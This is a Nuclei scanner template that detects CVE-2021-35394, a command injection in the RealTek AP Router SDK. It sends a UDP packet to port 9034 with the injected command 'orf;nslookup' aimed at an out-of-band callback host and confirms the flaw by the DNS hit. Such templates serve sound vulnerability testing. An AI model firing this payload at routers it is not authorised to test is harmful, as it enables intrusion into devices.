id: CVE-2021-35394

info:
  name: RealTek AP Router SDK - Arbitrary Command Injection
  author: king-alexander
  severity: critical
  remediation: Apply the latest security patches or updates provided by RealTek.
  description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
  classification:
    epss-score: 0.94335
  tags: cve,cve2021,realtek,rce,kev

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      let message = `orf;nslookup ${OAST}`
      let data = message;
      packet.WriteString(data)
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());

    args:
      Host: "{{Host}}"
      Port: 9034
      OAST: "{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100d0283b1e0d0beeafe6af8ee6d906a5c6b23adb110f5661344618dd7290b490b902210085bf17c10580b299edb8a1c38e96439035f00ceee132fdb8668c43052a091779:922c64590222798bb761d5b6d8e72950